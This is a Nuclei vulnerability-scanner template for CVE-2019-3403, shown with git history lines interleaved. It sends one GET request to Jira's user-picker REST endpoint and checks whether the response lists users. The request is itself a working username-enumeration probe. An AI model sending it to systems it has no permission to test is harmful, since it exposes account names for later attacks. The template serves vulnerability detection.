daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/cves/2019/CVE-2019-3403.yaml

38 lines
1014 B
YAML
Raw Normal View History

Create CVE-2019-3403.yaml (#873)
2021-02-16 16:55:16 +00:00
id: CVE-2019-3403
info:
name: User enumeration via an incorrect authorisation check
author: Ganofins
severity: medium
description: The /rest/api/2/user/picker rest resource in Jira before version 7.13.3, from version 8.0.0 before version 8.0.4, and from version 8.1.0 before version 8.1.1 allows remote attackers to enumerate usernames via an incorrect authorisation check.
Relevant reference
2021-04-06 10:27:39 +00:00
reference: https://jira.atlassian.com/browse/JRASERVER-69242
Create CVE-2019-3403.yaml (#873)
2021-02-16 16:55:16 +00:00
tags: cve,cve2019,atlassian,jira
Added cve annotations + severity adjustments
2021-09-10 11:26:40 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.30
cve-id: CVE-2019-3403
cwe-id: CWE-863
Create CVE-2019-3403.yaml (#873)
2021-02-16 16:55:16 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/rest/api/2/user/picker?query="
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- 'application/json'
part: header
- type: word
words:
- users
- total
- header
condition: and